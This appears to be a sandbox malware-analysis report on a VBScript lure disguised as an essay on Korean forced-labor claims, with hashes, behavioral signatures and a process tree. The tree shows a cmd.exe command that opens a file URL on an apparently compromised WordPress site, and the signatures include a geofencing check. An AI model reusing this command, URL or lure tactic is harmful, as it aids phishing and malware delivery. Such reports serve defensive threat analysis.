Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
259s -
max time network
289s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
20/04/2024, 06:42
Static task
static1
Behavioral task
behavioral1
Sample
Essay on Resolution of Korean Forced Labor Claims.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Essay on Resolution of Korean Forced Labor Claims.vbs
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Essay on Resolution of Korean Forced Labor Claims.vbs
Resource
win10v2004-20240412-en
Behavioral task
behavioral4
Sample
Essay on Resolution of Korean Forced Labor Claims.vbs
Resource
win11-20240412-en
General
-
Target
Essay on Resolution of Korean Forced Labor Claims.vbs
-
Size
27KB
-
MD5
75ec9f68a5b62705c115db5119a78134
-
SHA1
6209f948992fd18d4fc6fc6f89d9815369ac8931
-
SHA256
ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf
-
SHA512
82a0d96640390b8ffdcecd34fc1ae1663c84a299448a5af02b24bf9b9e1fdd19954ceeeea555808a57fcdc452b2b6e598338f11bb0c7101b34934a8ec7bf1780
-
SSDEEP
384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 35 4320 WScript.exe 40 4320 WScript.exe 57 4320 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4204 msedge.exe 4204 msedge.exe 3884 msedge.exe 3884 msedge.exe 2400 identity_helper.exe 2400 identity_helper.exe 700 msedge.exe 700 msedge.exe 700 msedge.exe 700 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4320 wrote to memory of 3376 4320 WScript.exe 90 PID 4320 wrote to memory of 3376 4320 WScript.exe 90 PID 3376 wrote to memory of 2400 3376 cmd.exe 92 PID 3376 wrote to memory of 2400 3376 cmd.exe 92 PID 3084 wrote to memory of 3884 3084 explorer.exe 94 PID 3084 wrote to memory of 3884 3084 explorer.exe 94 PID 3884 wrote to memory of 3920 3884 msedge.exe 96 PID 3884 wrote to memory of 3920 3884 msedge.exe 96 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 380 3884 msedge.exe 98 PID 3884 wrote to memory of 4204 3884 msedge.exe 99 PID 3884 wrote to memory of 4204 3884 msedge.exe 99 PID 3884 wrote to memory of 4012 3884 msedge.exe 100 PID 3884 wrote to memory of 4012 3884 msedge.exe 100 PID 3884 wrote to memory of 4012 3884 msedge.exe 100 PID 3884 wrote to memory of 4012 3884 msedge.exe 100 PID 3884 wrote to memory of 4012 3884 msedge.exe 100 PID 3884 wrote to memory of 4012 3884 msedge.exe 100 PID 3884 wrote to memory of 4012 3884 msedge.exe 100 PID 3884 wrote to memory of 4012 3884 msedge.exe 100 PID 3884 wrote to memory of 4012 3884 msedge.exe 100 PID 3884 wrote to memory of 4012 3884 msedge.exe 100 PID 3884 wrote to memory of 4012 3884 msedge.exe 100 PID 3884 wrote to memory of 4012 3884 msedge.exe 100 PID 3884 wrote to memory of 4012 3884 msedge.exe 100 PID 3884 wrote to memory of 4012 3884 msedge.exe 100
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Essay on Resolution of Korean Forced Labor Claims.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"2⤵
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\explorer.exeexplorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"3⤵PID:2400
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd10d446f8,0x7ffd10d44708,0x7ffd10d447183⤵PID:3920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:23⤵PID:380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:4204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:83⤵PID:4012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:13⤵PID:3040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:13⤵PID:736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:83⤵PID:3260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:2400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:13⤵PID:556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:13⤵PID:3888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:13⤵PID:1292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:13⤵PID:4008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4856 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:700
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2996
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3968
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD53d94406b964753cc5222ab1343f54bb1
SHA1a5e7de0781fa1fabb3cd89564f2e5693cb4dee16
SHA256fd9923a217cd8d2c44a63dbfe52ec262e7c80b1f1e50c6e0f21f8379c90e7762
SHA5121ad2c144e7bbd809f400f8782586d3768fc82bcef39db986f766897c344efec77ab2c0b6d9c5ee2019ef5cf9ad0c46bdd25392cbc9dbf9ea80e800577f0fc598
-
Filesize
152B
MD549dde89f025a1cce8848473379f7c28f
SHA1b405956b33146b2890530e818b6aa74bba3afb88
SHA256d6d125ba686b825bb22ab967a346051780cab1f55fc68a2f3efdf3fb5598f96b
SHA51253050344674d8886db66e25f42d97bf46b26229972631f857286c2a303897cda58d85ee8ca768bbfb1fc07e52567315ea85d57e39b5b382916700ec389946506
-
Filesize
499B
MD5e95520708877b213ed99c2e08c1a9db1
SHA18948fe9ec9ecbe46b0e1856d125a59ad4bbfe640
SHA2567c527b497f9fb3e4db82462d5e7a1e495366e9f1183a708c9569ce42650fc691
SHA5125440c1f849ae1d5bfe2c83ff186928713a6ed040aebdf0405e4c7f981504705647c93a030ec44bc5a9d2755ae746a77c28661347fbf97a8c64dad32d3a775b08
-
Filesize
5KB
MD5fcb85e39a754275e9bf8106eeb88ac58
SHA1ce7ba308508a286f36c184de01917041c9e8b347
SHA2569391a2126133e9d177c4435056bb2884ba33f1530ee114a492658537beb1cf59
SHA5121638400d339f837f20ffb566026bb07a54f328ea3b3360dc0726893e558f32bc566ecce6b6373255635dca38dc48ea8cc48f7fe91f61b695e0df6a58c84050dd
-
Filesize
6KB
MD55e964781288614f24d4f3986ac1f2f63
SHA128b26b06b747678bd22d9199eea36dda3e058838
SHA256d69223524f274d22b263b28c2510efb6c2bd796df7e3befb7f085545d1d59ad4
SHA512d5cf315cbd0b549eb069f1d077bf895122ec200a55a2f59be074002b6a745f31978ac3569c09a41634338a8ca97da0f275cf43deee8f3d78914394975c1853d5
-
Filesize
24KB
MD57c43199d1e5acf5a31e1cbef990fbc47
SHA1df7bd524b9b3175325c0aff3469ea7f2211d3061
SHA25652a6fd2a2fff53c738c77a6385e7e1677f8990781699f78c63d5a4b0fe566d22
SHA512aae886642b40ffb0676534fd85abe43ab588526b8e952b12a1bcafc73cb05103c76aee4fa32cc18c74af6c59aa1dc84bcda09ebccb7d11adc79fee3bfc93e2d1
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5fa8f393f2823c003ed490927aead9096
SHA12f383373340e23408bab0a62cd0ae88b62fb6abf
SHA25658d6bdfa5e8130e44ff8217db783456296041c832f34f44ad83dfc8783aa1ff2
SHA51259995106fbafee26d9a46d7ff28c8c06a18862ea3e8886ce3505fdd7d6ade9938980dd9d4264876a41c6a7de673b9fd9bd80c1da56e3306753077726da262a06